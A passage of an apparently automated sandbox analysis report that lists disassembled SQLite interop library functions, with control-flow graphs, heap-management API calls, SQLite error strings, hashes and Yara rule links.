                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse$unable to delete/modify user-function due to active statements
                                                                                      • API String ID: 1952225102-2458741163
                                                                                      • Opcode ID: e9d31b8ba83dcee3e9ed52f3250273f6e3d883882fb1bbe13514b1c1fb33e91b
                                                                                      • Instruction ID: 8e04468dcdda495f5b8a901d68a90eaa3a611e2b63c0786df148303d8b6f34db
                                                                                      • Opcode Fuzzy Hash: e9d31b8ba83dcee3e9ed52f3250273f6e3d883882fb1bbe13514b1c1fb33e91b
                                                                                      • Instruction Fuzzy Hash: 3551C3716042059BEB14CE25D880FAB7BE6EF84369F258929FC09DBB40D731D866CBD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C447230 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 123COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1123 6c447230-6c44724b call 6c4dcc30 1126 6c447275-6c44727a 1123->1126 1127 6c44724d-6c447274 call 6c4dedf0 1123->1127 1129 6c447286-6c44728b 1126->1129 1130 6c44727c-6c447283 1126->1130 1132 6c447307 1129->1132 1133 6c44728d-6c447293 1129->1133 1130->1129 1134 6c44730a-6c447327 call 6c447390 1132->1134 1136 6c447295-6c44729c 1133->1136 1137 6c4472d2-6c4472da 1133->1137 1142 6c44732c-6c447335 1134->1142 1139 6c44729e-6c4472a5 1136->1139 1140 6c4472a8-6c4472bd call 6c4e1c20 1136->1140 1148 6c4472dc 1137->1148 1139->1140 1149 6c4472cc-6c4472d0 1140->1149 1150 6c4472bf-6c4472ca 1140->1150 1146 6c447337-6c44733a 1142->1146 1147 6c447351-6c447355 1142->1147 1146->1147 1151 6c44733c-6c44734a call 6c4e1a20 1146->1151 1153 6c447357-6c447359 1147->1153 1154 6c44735f-6c447368 call 6c4e1120 1147->1154 1152 6c4472df-6c4472e1 1148->1152 1149->1152 1150->1148 1171 6c44734e 1151->1171 1157 6c4472f6-6c447305 1152->1157 1158 6c4472e3-6c4472f4 call 6c4e11d0 1152->1158 1153->1154 1155 6c44735b-6c44735d 1153->1155 1159 6c44736a-6c44736f 1154->1159 1155->1159 1157->1134 1158->1171 1164 6c447371-6c447378 1159->1164 1165 6c44737b-6c447383 1159->1165 1164->1165 1171->1147
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000292EE,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C447263
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C44725C
                                                                                      • misuse, xrefs: 6C447257
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C44724D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: d8f722da19ecb3ae0b1f4f8e9fcf935d7b33615cc48ba6fddcd2bc6b2354cfdd
                                                                                      • Instruction ID: 332a87802cf9910c956feac64c20420e5d94bd9221029c0c68282c83419fae67
                                                                                      • Opcode Fuzzy Hash: d8f722da19ecb3ae0b1f4f8e9fcf935d7b33615cc48ba6fddcd2bc6b2354cfdd
                                                                                      • Instruction Fuzzy Hash: D441EF71A082069BEB11DF25DC44E8BB7A5FF45719F158528FC1893B00EB31E96AC7D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446FA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1172 6c446fa0-6c446fb2 call 6c4dcc30 1175 6c447053-6c44707a call 6c4dedf0 1172->1175 1176 6c446fb8-6c446fbd 1172->1176 1176->1175 1177 6c446fc3-6c446fc9 1176->1177 1177->1175 1179 6c446fcf-6c446fd4 1177->1179 1181 6c446fd6-6c446fdd 1179->1181 1182 6c446fe0-6c446ffc call 6c48ae30 1179->1182 1181->1182 1186 6c446ffe-6c447005 1182->1186 1187 6c447008-6c44700a 1182->1187 1186->1187 1188 6c447013-6c44701e SI1c7a7970970b9619 1187->1188 1189 6c44700c-6c447012 1187->1189 1191 6c447020-6c447029 1188->1191 1192 6c44702a-6c447046 call 6c447230 1188->1192 1194 6c44704b-6c447052 1192->1194
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(?), ref: 6C447014
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00029383,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C4859F0,00000000,MATCH,00000002,00000000,6C4459DD), ref: 6C447069
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C447062
                                                                                      • misuse, xrefs: 6C44705D
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C447053
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I1c7a7970970b9619.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 661589191-1203237178
                                                                                      • Opcode ID: bcc8a8fa801496042e3df103c4134712392f00634a50cc2012377fb22795d790
                                                                                      • Instruction ID: 9f975cb9c30e73f51533e238814d7d981e47e8d22937aed429664e5e866958b4
                                                                                      • Opcode Fuzzy Hash: bcc8a8fa801496042e3df103c4134712392f00634a50cc2012377fb22795d790
                                                                                      • Instruction Fuzzy Hash: 16113A7274530427FA10D569BC81FAAB35ADBC062FF208435FA1DD7BC0D652E40681D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C48AC50 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1195 6c48ac50-6c48acad call 6c4dc5d0 1198 6c48acb3-6c48acbc 1195->1198 1199 6c48adb5-6c48ade0 call 6c4dc5d0 1195->1199 1200 6c48acc2-6c48acc6 1198->1200 1201 6c48ada4-6c48adac 1198->1201 1207 6c48adfc-6c48ae1a call 6c4dc5d0 * 2 1199->1207 1208 6c48ade2-6c48ade7 1199->1208 1200->1201 1204 6c48accc-6c48acda call 6c46b810 1200->1204 1201->1198 1203 6c48adb2 1201->1203 1203->1199 1213 6c48acdc-6c48ace2 call 6c4e1a20 1204->1213 1214 6c48ace5-6c48acea 1204->1214 1228 6c48ae1c 1207->1228 1229 6c48ae1f-6c48ae2d 1207->1229 1210 6c48ade9-6c48aded 1208->1210 1211 6c48adf6-6c48adfa 1208->1211 1210->1211 1215 6c48adef-6c48adf1 call 6c492a00 1210->1215 1211->1207 1211->1208 1213->1214 1219 6c48acec-6c48acf2 call 6c4e1a20 1214->1219 1220 6c48acf5-6c48acfa 1214->1220 1215->1211 1219->1220 1225 6c48acfc-6c48acfe call 6c4a4300 1220->1225 1226 6c48ad03-6c48ad08 1220->1226 1225->1226 1231 6c48ad98-6c48ada1 call 6c4e1a20 1226->1231 1232 6c48ad0e-6c48ad13 1226->1232 1228->1229 1231->1201 1234 6c48ad2d-6c48ad31 1232->1234 1235 6c48ad15-6c48ad1c 1232->1235 1236 6c48ad3c-6c48ad43 1234->1236 1237 6c48ad33-6c48ad39 call 6c4e1a20 1234->1237 1239 6c48ad1e-6c48ad24 call 6c4e1a20 1235->1239 1240 6c48ad27-6c48ad2b 1235->1240 1243 6c48ad8a 1236->1243 1244 6c48ad45-6c48ad4c 1236->1244 1237->1236 1239->1240 1240->1234 1240->1235 1249 6c48ad91 1243->1249 1247 6c48ad58-6c48ad7f 1244->1247 1248 6c48ad4e-6c48ad55 1244->1248 1250 6c48ad94 1247->1250 1254 6c48ad81-6c48ad88 1247->1254 1248->1247 1249->1250 1250->1231 1254->1249
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DC5D0: SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,6C48B035,00000000,?,?,?,?,?,?,00000001,00000000,?), ref: 6C4DC5E1
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,00000000), ref: 6C48ACDD
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000000), ref: 6C48ACED
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000000), ref: 6C48AD1F
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000000), ref: 6C48AD34
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000000), ref: 6C48AD9C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: d36d73f60c4629d20be7c6e523921fd6a352998938fcbc9daac3f0fb2c1bcd59
                                                                                      • Instruction ID: 37035f44df9cdd8d54c8b877cf2e345e58c760a3fdd95ed744449e32c34e9da1
                                                                                      • Opcode Fuzzy Hash: d36d73f60c4629d20be7c6e523921fd6a352998938fcbc9daac3f0fb2c1bcd59
                                                                                      • Instruction Fuzzy Hash: 5851B1B1902612ABDB01CF24C809F5AB7B1BF5031AF158618DC6597F80EB75F599CBC1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4CD450 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 164COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1256 6c4cd450-6c4cd464 1257 6c4cd476-6c4cd47c call 6c4cf0f0 1256->1257 1258 6c4cd466-6c4cd470 1256->1258 1261 6c4cd481-6c4cd488 1257->1261 1258->1257 1259 6c4cd472-6c4cd474 1258->1259 1262 6c4cd4a7-6c4cd4a9 1259->1262 1263 6c4cd48a-6c4cd490 1261->1263 1264 6c4cd4a4 1261->1264 1265 6c4cd4ab-6c4cd4b8 call 6c4cd620 1262->1265 1266 6c4cd4c0 1262->1266 1267 6c4cd60c-6c4cd612 1263->1267 1268 6c4cd496-6c4cd49e 1263->1268 1264->1262 1276 6c4cd4be 1265->1276 1277 6c4cd5b7-6c4cd5be 1265->1277 1270 6c4cd4c5-6c4cd4c9 1266->1270 1268->1264 1272 6c4cd4cb-6c4cd4cf 1270->1272 1273 6c4cd517-6c4cd520 1270->1273 1272->1273 1278 6c4cd4d1-6c4cd4d5 1272->1278 1274 6c4cd541-6c4cd549 1273->1274 1275 6c4cd522-6c4cd525 1273->1275 1280 6c4cd54b-6c4cd551 1274->1280 1281 6c4cd557-6c4cd55f call 6c4cf0f0 1274->1281 1275->1274 1279 6c4cd527-6c4cd53f 1275->1279 1276->1270 1282 6c4cd5c0-6c4cd5de call 6c4dedf0 1277->1282 1283 6c4cd5e3-6c4cd5e7 1277->1283 1284 6c4cd50d-6c4cd512 1278->1284 1285 6c4cd4d7-6c4cd4ef 1278->1285 1279->1274 1288 6c4cd5b3-6c4cd5b5 1279->1288 1280->1281 1289 6c4cd553-6c4cd555 1280->1289 1296 6c4cd564-6c4cd56b 1281->1296 1282->1283 1286 6c4cd5e9-6c4cd5eb 1283->1286 1287 6c4cd60a 1283->1287 1284->1288 1285->1288 1301 6c4cd4f5-6c4cd4f8 1285->1301 1292 6c4cd5ed-6c4cd603 call 6c4ce670 1286->1292 1293 6c4cd606 1286->1293 1287->1267 1288->1277 1288->1283 1295 6c4cd56d-6c4cd57b call 6c4cd620 1289->1295 1292->1293 1293->1287 1300 6c4cd58f-6c4cd593 1295->1300 1307 6c4cd57d-6c4cd589 call 6c4ce720 1295->1307 1296->1295 1296->1300 1300->1288 1306 6c4cd595-6c4cd59d 1300->1306 1301->1284 1303 6c4cd4fa-6c4cd50a 1301->1303 1303->1284 1306->1288 1308 6c4cd59f-6c4cd5b0 1306->1308 1307->1300 1308->1288
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000E,%s at line %d of [%.10s],cannot open file,0000F633,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000), ref: 6C4CD5D6
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4CD5CF
                                                                                      • cannot open file, xrefs: 6C4CD5CA
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4CD5C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$cannot open file
                                                                                      • API String ID: 1952225102-2886990422
                                                                                      • Opcode ID: 0365f7bb83706ddd1455a8f0016d80f4f90b39230f6f9e45a479edabc0141977
                                                                                      • Instruction ID: 522d3b12238c7d61934c8632a1caef1535b616b4100805af5808f0c827806bb3
                                                                                      • Opcode Fuzzy Hash: 0365f7bb83706ddd1455a8f0016d80f4f90b39230f6f9e45a479edabc0141977
                                                                                      • Instruction Fuzzy Hash: 68512238B847409FE711DA68C880F1676F19F8432DF14056DE4998BBA1DBB9E946C782
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C477A30 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 94COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1313 6c477a30-6c477a47 1314 6c477a49-6c477a53 1313->1314 1315 6c477a58-6c477a61 call 6c4dcc30 1313->1315 1317 6c477b1d-6c477b3c call 6c4dedf0 1314->1317 1320 6c477a67-6c477a6b 1315->1320 1321 6c477b13-6c477b18 1315->1321 1320->1321 1323 6c477a71-6c477a76 1320->1323 1321->1317 1324 6c477a82-6c477a85 1323->1324 1325 6c477a78-6c477a7f 1323->1325 1326 6c477a87-6c477a8e call 6c4cb900 1324->1326 1327 6c477a90-6c477aa5 call 6c477b40 1324->1327 1325->1324 1326->1327 1332 6c477aaa-6c477ab5 1327->1332 1332->1327 1333 6c477ab7-6c477aba 1332->1333 1334 6c477acd-6c477ad1 1333->1334 1335 6c477abc-6c477acb call 6c493150 1333->1335 1337 6c477ad3-6c477ad5 call 6c4cb8b0 1334->1337 1338 6c477ada-6c477ade 1334->1338 1335->1327 1335->1334 1337->1338 1341 6c477ae4-6c477aed call 6c4e1120 1338->1341 1342 6c477ae0-6c477ae2 1338->1342 1344 6c477aef-6c477afe 1341->1344 1342->1341 1342->1344 1346 6c477b00-6c477b07 1344->1346 1347 6c477b0a-6c477b12 1344->1347 1346->1347
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00020832,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,6C40EF31,?,00000080,00000000,?,?), ref: 6C477B29
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 9dc13b88b8efe149a31524fb4a995512dd1ab1b14b695591b68342c585bebce4
                                                                                      • Instruction ID: 2b129dee495673d3e890c25743fc40f0518f9e28f79631cd0e7eecaaa8666ab1
                                                                                      • Opcode Fuzzy Hash: 9dc13b88b8efe149a31524fb4a995512dd1ab1b14b695591b68342c585bebce4
                                                                                      • Instruction Fuzzy Hash: C02134717087451BEF22DE699C01E9B7B96DB8035EF40462EED29C3B81EB70C91487E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4DBC30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1349 6c4dbc30-6c4dbc39 1350 6c4dbc3b-6c4dbc40 1349->1350 1351 6c4dbc41-6c4dbc46 1349->1351 1352 6c4dbc48-6c4dbc55 1351->1352 1353 6c4dbc96-6c4dbc9c 1351->1353 1354 6c4dbc5c-6c4dbc6a HeapCreate 1352->1354 1355 6c4dbc57-6c4dbc59 1352->1355 1356 6c4dbc6c-6c4dbc8e call 6c4dedf0 1354->1356 1357 6c4dbc8f 1354->1357 1355->1354 1357->1353
                                                                                      APIs
                                                                                      • HeapCreate.KERNEL32(00000000,00BD0000,00000000,00000000,6C512494,00000000,?,6C4DBED6,6C514234,6C514234), ref: 6C4DBC60
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000007,failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu,00000000,?,6C4DBED6,6C514234,6C514234), ref: 6C4DBC7D
                                                                                      Strings
                                                                                      • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 6C4DBC76
                                                                                      • 4BQl4BQl, xrefs: 6C4DBC34
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHeapI950480ab972e108d.
                                                                                      • String ID: 4BQl4BQl$failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                      • API String ID: 3027474161-1026468862
                                                                                      • Opcode ID: f0d2120d16c27f4c39aa617638a65d9ef82755da619e29e490d7142c432fb364
                                                                                      • Instruction ID: cf74fd17755a056647964e1b79f539fe092d335601ebd672e120a2b0a534a193
                                                                                      • Opcode Fuzzy Hash: f0d2120d16c27f4c39aa617638a65d9ef82755da619e29e490d7142c432fb364
                                                                                      • Instruction Fuzzy Hash: 12F0F9767042046BEB20AE95EC54F5777BDE7C176AF02042EF94883A00E631B80082D0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4DBD60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1401 6c4dbd60-6c4dbd70 1402 6c4dbd98-6c4dbd9b 1401->1402 1403 6c4dbd72-6c4dbd7e RtlFreeHeap 1401->1403 1403->1402 1404 6c4dbd80-6c4dbd95 call 6c4dedf0 1403->1404 1404->1402
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(06E60000,00000000,?), ref: 6C4DBD76
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000007,failed to HeapFree block %p (%lu), heap=%p,?,00000000), ref: 6C4DBD90
                                                                                      Strings
                                                                                      • failed to HeapFree block %p (%lu), heap=%p, xrefs: 6C4DBD89
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeapI950480ab972e108d.
                                                                                      • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                      • API String ID: 2271127883-4030396798
                                                                                      • Opcode ID: 1216ead8262d91936bbaa6da9292c5affacbe6d15f4261fece9eadc360b6e908
                                                                                      • Instruction ID: 4731bbc3a3dc1e70102d2c2b60d8803404bd845ca29761b156c587a5fbf4674e
                                                                                      • Opcode Fuzzy Hash: 1216ead8262d91936bbaa6da9292c5affacbe6d15f4261fece9eadc360b6e908
                                                                                      • Instruction Fuzzy Hash: 4BE0863674222077C9116A869C09FAB7B7CCF97EA6F160096F90CA7A00D761F44182F5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4DBDA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(06E60000,00000000,?), ref: 6C4DBDB1
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000007,failed to HeapAlloc %u bytes (%lu), heap=%p,?,00000000), ref: 6C4DBDCF
                                                                                      Strings
                                                                                      • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 6C4DBDC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeapI950480ab972e108d.
                                                                                      • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                      • API String ID: 3669567346-667713680
                                                                                      • Opcode ID: 57d2a2a76c79738362f59668f6b4b93a64acc4af3ae7cec359400853e380c085
                                                                                      • Instruction ID: ef88f3fcdf293b143ac22bd5da0cabb39787c2c72ec8b640aad70e3248fdb796
                                                                                      • Opcode Fuzzy Hash: 57d2a2a76c79738362f59668f6b4b93a64acc4af3ae7cec359400853e380c085
                                                                                      • Instruction Fuzzy Hash: 94E0863A70022577CE126B869C09F9B3E3DD786AA5F020065FE0896B01D761E80187E5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4C8E60 Relevance: 4.6, APIs: 3, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,6C4C710B), ref: 6C4C8ED3
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,6C4C710B), ref: 6C4C8EF5
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,6C4C710B), ref: 6C4C8F18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
